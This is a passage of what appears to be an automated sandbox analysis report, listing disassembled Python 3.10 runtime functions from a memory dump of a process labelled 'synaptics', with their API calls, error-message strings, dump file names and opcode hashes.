                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B2103716013015BE7109F29CC54BABBBF4EB8036CF14462DD86997B40EB31E809CBD1
                                                                                                                                                                                                      Function 6C4B4CD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _Py_CheckFunctionResult.PYTHON310(?,?,00000000,00000000,?,O|Kl,80000001,00000000), ref: 6C4B4D10
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,?,O|Kl,00000001,00000000), ref: 6C4B4D28
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get,?,00000000,00000000,6C4B7C4F,?,?,?), ref: 6C4B4D3B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CallCheckError_FatalFunctionMakeObject_ResultTstate
                                                                                                                                                                                                      • String ID: O|Kl$PyThreadState_Get
                                                                                                                                                                                                      • API String ID: 1083775403-2369974621
                                                                                                                                                                                                      • Opcode ID: 3cd49e1015f83e6b851d1fba20923771c21aae2ca61531450c56f1832e127d56
                                                                                                                                                                                                      • Instruction ID: f44cb5a3640f39d29993d6e0405793a1386c7b78385c3d0ba22d30dbdbcacd13
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cd49e1015f83e6b851d1fba20923771c21aae2ca61531450c56f1832e127d56
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7311EF31601218ABD710CA59EC01FFA73ACEB85669F20416AFC18D7B81DB71E915C6F1
                                                                                                                                                                                                      Function 6C5638E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(cannot exit context: %R has not been entered,?,?,?,?,?), ref: 6C56382B
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73E920,00000000,00000000,00000000,00000000,?,?,?,?), ref: 6C56386D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • cannot exit context: thread state references a different context object, xrefs: 6C563852
                                                                                                                                                                                                      • cannot exit context: %R has not been entered, xrefs: 6C563820
                                                                                                                                                                                                      • an instance of Context was expected, xrefs: 6C563812
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatObject
                                                                                                                                                                                                      • String ID: an instance of Context was expected$cannot exit context: %R has not been entered$cannot exit context: thread state references a different context object
                                                                                                                                                                                                      • API String ID: 3439641430-568736459
                                                                                                                                                                                                      • Opcode ID: 29f638142efc6aeebc4bd75fa9c1704aa878ed1e47b50fca46397acec903ec8e
                                                                                                                                                                                                      • Instruction ID: 25efca070803b9c03e25c51b566632f98cac93ad07bf825c22a016fc0c60edd2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29f638142efc6aeebc4bd75fa9c1704aa878ed1e47b50fca46397acec903ec8e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2321A072B052049BD7148A5AEC41B92B3E4FB81339F148369E92887FE0DB71FD4587E1
                                                                                                                                                                                                      Function 6C58D820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87timeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C58D830
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,timestamp too large to convert to C _PyTime_t), ref: 6C58D875
                                                                                                                                                                                                      • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000,00000000,?,000F4240,00000000), ref: 6C58D8C4
                                                                                                                                                                                                      • PyErr_SetExcFromWindowsErrWithFilename.PYTHON310(00000000,00000000,?,000F4240,00000000), ref: 6C58D8D6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • timestamp too large to convert to C _PyTime_t, xrefs: 6C58D86E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$AdjustmentCount64FilenameFromStringSystemTickTimeWindowsWith
                                                                                                                                                                                                      • String ID: timestamp too large to convert to C _PyTime_t
                                                                                                                                                                                                      • API String ID: 2206752394-3520371772
                                                                                                                                                                                                      • Opcode ID: 06ebfbd759a6453590ae2c76304b10113deb1b306eeae84f9dd2804571cda146
                                                                                                                                                                                                      • Instruction ID: 5fe0886dfca65c5306d12f6bd8ab074b812907d650eb0b837ef670cd09b33721
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06ebfbd759a6453590ae2c76304b10113deb1b306eeae84f9dd2804571cda146
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27212972A00614ABC7109E799C45756B7FCEBC5339F508737F828D3B80EB31D4448691
                                                                                                                                                                                                      Function 6C485F80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\funcobject.c,00000091), ref: 6C485FB1
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\funcobject.c, xrefs: 6C485FA0
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C485FA5
                                                                                                                                                                                                      • non-tuple default args, xrefs: 6C486019
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\funcobject.c$non-tuple default args
                                                                                                                                                                                                      • API String ID: 376477240-2148243249
                                                                                                                                                                                                      • Opcode ID: eb87b102d7f5a80b2e796bbf962b253a387acff4677b3ac500230d887c6c4e44
                                                                                                                                                                                                      • Instruction ID: 03813ab188a21eaa247452dfde5aa530e06d01203b99fd0c750a2ad80924aab6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb87b102d7f5a80b2e796bbf962b253a387acff4677b3ac500230d887c6c4e44
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC21F8767012045BDA10DA999C41F9673B4EB8233AF144369EE2DCBFD1D621EC45C7D1
                                                                                                                                                                                                      Function 6C4518D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PySequence_Check.PYTHON310(?), ref: 6C451922
                                                                                                                                                                                                      • PyErr_Format.PYTHON310('%.200s' object can't be concatenated,?), ref: 6C45196A
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C45198F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object can't be concatenated, xrefs: 6C45195F
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C451983
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$CheckFormatSequence_String
                                                                                                                                                                                                      • String ID: '%.200s' object can't be concatenated$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1714718377-586038359
                                                                                                                                                                                                      • Opcode ID: 91f9783f84b277ff0da585cb472b67c636c00eb907120a9f9791d3f745df5faa
                                                                                                                                                                                                      • Instruction ID: 76f9542cf64384cf9b540b6d61bf4cd744ba9c491751fc59956d0946a447d7a8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91f9783f84b277ff0da585cb472b67c636c00eb907120a9f9791d3f745df5faa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 332123B67012059BEB00CE56EC00F9A37A99FC162AF998138E91C9BB51D735D822CB91
                                                                                                                                                                                                      Function 6C488C80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%R returned NULL without setting an exception,6C73C3F8), ref: 6C488CCA
                                                                                                                                                                                                      • _PyErr_FormatFromCauseTstate.PYTHON310(?,%R returned a result with an exception set,6C73C3F8), ref: 6C488CFE
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,6C73C3F8,?,?,00000000,?,?,?,6C489D8D,?,80000001,?), ref: 6C488D20
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %R returned NULL without setting an exception, xrefs: 6C488CBE
                                                                                                                                                                                                      • %R returned a result with an exception set, xrefs: 6C488CF2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format$CallCauseFromMakeObject_Tstate
                                                                                                                                                                                                      • String ID: %R returned NULL without setting an exception$%R returned a result with an exception set
                                                                                                                                                                                                      • API String ID: 553699577-2074375803
                                                                                                                                                                                                      • Opcode ID: 5b2379385baad74e6ba0afabc9618c7b409a8c9c3f557d8c5dd3268b29050fb1
                                                                                                                                                                                                      • Instruction ID: f30a67a081453134cb8805cfe11470a788b11118a3ac7b261d3f5519aeb5aa67
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b2379385baad74e6ba0afabc9618c7b409a8c9c3f557d8c5dd3268b29050fb1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF1129327061006BDB10A95DAC01EAA73E8DF5533AF04026AFC2CC7791EB31D82197E0
                                                                                                                                                                                                      Function 6C476E80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BD78,input too long), ref: 6C476EBA
                                                                                                                                                                                                      • PyObject_Hash.PYTHON310(00000000), ref: 6C476EFA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_HashObject_String
                                                                                                                                                                                                      • String ID: @Btl$input too long
                                                                                                                                                                                                      • API String ID: 3164799074-3566857136
                                                                                                                                                                                                      • Opcode ID: 1bfa0ed320051a39eb4aaa238ad2e64ab77c1b9cab28cb77908f638acbd327b0
                                                                                                                                                                                                      • Instruction ID: 1a9ee68565e4ec06db2e9f586a7947b7eb67fc5221ff66afb6834df00546f854
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bfa0ed320051a39eb4aaa238ad2e64ab77c1b9cab28cb77908f638acbd327b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B11E672E4451057C630892EBC02FD6779A8B8637AF144769ED79DBFC0EA21A84682F1
                                                                                                                                                                                                      Function 6C451C90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine,?,?,?,?,6C44EFDA,?,00000000), ref: 6C451CB7
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C451CAB
                                                                                                                                                                                                      • %.200s is not a sequence, xrefs: 6C451D12
                                                                                                                                                                                                      • '%.200s' object doesn't support item deletion, xrefs: 6C451D1C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: %.200s is not a sequence$'%.200s' object doesn't support item deletion$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1622067708-3719879141
                                                                                                                                                                                                      • Opcode ID: 186066f2326a389aab69cb1512b5911b15054f4a8008b4ba9e7ac771a67bb38a
                                                                                                                                                                                                      • Instruction ID: 46f43a919844837ace59315a55bede0df21f7fc70aa23a3d0cb319c6c853695a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 186066f2326a389aab69cb1512b5911b15054f4a8008b4ba9e7ac771a67bb38a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD11C436302204AFEF01CE59FC40E597369EF8063EB540269E93897F51D722F865C7A0
                                                                                                                                                                                                      Function 6C451BE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C451C07
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • '%.200s' object does not support item assignment, xrefs: 6C451C6D
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C451BFB
                                                                                                                                                                                                      • %.200s is not a sequence, xrefs: 6C451C63
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$ObjectString
                                                                                                                                                                                                      • String ID: %.200s is not a sequence$'%.200s' object does not support item assignment$null argument to internal routine
                                                                                                                                                                                                      • API String ID: 1622067708-2601431501
                                                                                                                                                                                                      • Opcode ID: f7132c885d39ebb28bcdca5e5e290add69633d07a4eaf8f687e858fa1f604571
                                                                                                                                                                                                      • Instruction ID: 4930871580638c38b3a952d2c3645920f2236b3b6db37cf7e5afa8a3ad1e274c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7132c885d39ebb28bcdca5e5e290add69633d07a4eaf8f687e858fa1f604571
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F11C832706204AFEB02CE59ED80E5A7769AF8037A7544269E92C97F51D723EC61C7A0
                                                                                                                                                                                                      Function 6C451A90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
